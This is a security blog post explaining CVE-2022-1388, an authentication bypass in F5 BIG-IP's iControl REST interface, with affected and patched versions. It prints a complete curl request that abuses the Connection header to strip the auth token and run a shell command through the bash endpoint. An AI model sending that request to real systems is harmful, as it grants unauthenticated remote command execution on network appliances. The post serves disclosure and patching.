F5 BIG-IP critical vulnerability exploited by attackers to gain unauthenticated RCE

Written by Aarush Ahuja
Co-founder @ FourCore
f5 big-ip critical vulnerability

If you are a user of F5 BIG-IP application services, you might be vulnerable to an unauthenticated RCE being actively exploited by attackers. It is recorded as CVE-2022-1388 and has a CVSS score of 9.8 out of 10! It is a vulnerability in the iControl REST interfaced of F5's BIG-IP solution. It can be exploited by threat actors on F5 BIG-IP admin dashboard exposed to the internet. Attackers are already seen to be exploiting the vulnerability in the wild!

Are you vulnerable to CVE-2022-1388?

F5 BIG-IP application services product with the following versions are vulnerable:

  • 16.1.0 - 16.1.2
  • 15.1.0 - 15.1.5
  • 14.1.0 - 14.1.4
  • 13.1.0 - 13.1.4
  • 12.1.0 - 12.1.6
  • 11.6.1 - 11.6.5

The iControl REST service is a Java application with exposed by Apache webserver as the reverse proxy. The vulnerability exists in the flow of the authentication mechanism between Apache and the iControl application. F5 uses a custom Apache authentication module which performs authentication on requests flowing into Apache, it verifies the presence of the X-F5-Auth-Token and sends the request to the iControl application if it is present otherwise it is rejected.

If a request without the X-F5-Auth-Token header is passed into the iControl REST application, the application takes an alternate route and fulfils the request without the need of a token. The custom authentication module prevents an attacker from sending a request without a X-F5-Auth-Token header being passed to the iControl application.

However, in the authentication module, the check for the X-F5-Auth-Token is done before the Connection header is processed. Apart from the usual functionality of the Connection header, it can also be used to indicate that certain headers must be removed by the proxy. We can use this to indicate the authentication module to remove the X-F5-Auth-Token header and send it to the iControl application. As the basic token presence check is performed before processing the Connection header, it can be used to bypass the authentication module.

CVE-2022-1388 is trivial to exploit!

One can trivially craft a payload to execute arbritrary commands on a vulnerable system. The management API consists of a convenient command execution endpoint which can now be accessed because of the vulnerability.

$ curl -i -s -k -X $'POST'
-H $'Host: <redacted>:8443'
-H $'Authorization: Basic YWRtaW46'
-H $'Connection: keep-alive, X-F5-Auth-Token'
-H $'X-F5-Auth-Token: 0'
-H $'Content-Length: 52'
--data-binary $'{\"command\": \"run\" , \"utilCmdArgs\": \" -c \'id\' \" }\x0d\x0a'
$'https://<redacted>:8443/mgmt/tm/util/bash'
--proxy http://127.0.0.1:8080

The vulnerability is being actively exploited by attackers in the wild as reported by Palo Alto. Censys list over 2500 BIG-IP instances potentially vulnerable to CVE-2022-1388.

Mitigate CVE-2022-1388

Patches for the vulnerability are available for F5 BIG-IP deployments. Patch your deployment to the following version to mitigate CVE-2022-1388:

  • 17.0.0
  • 16.1.2.2
  • 15.1.5.1
  • 14.1.4.6
  • 13.1.5

If you are unable to upgrade yet, follow the official advisory by F5 for mitigative actions to perform.

References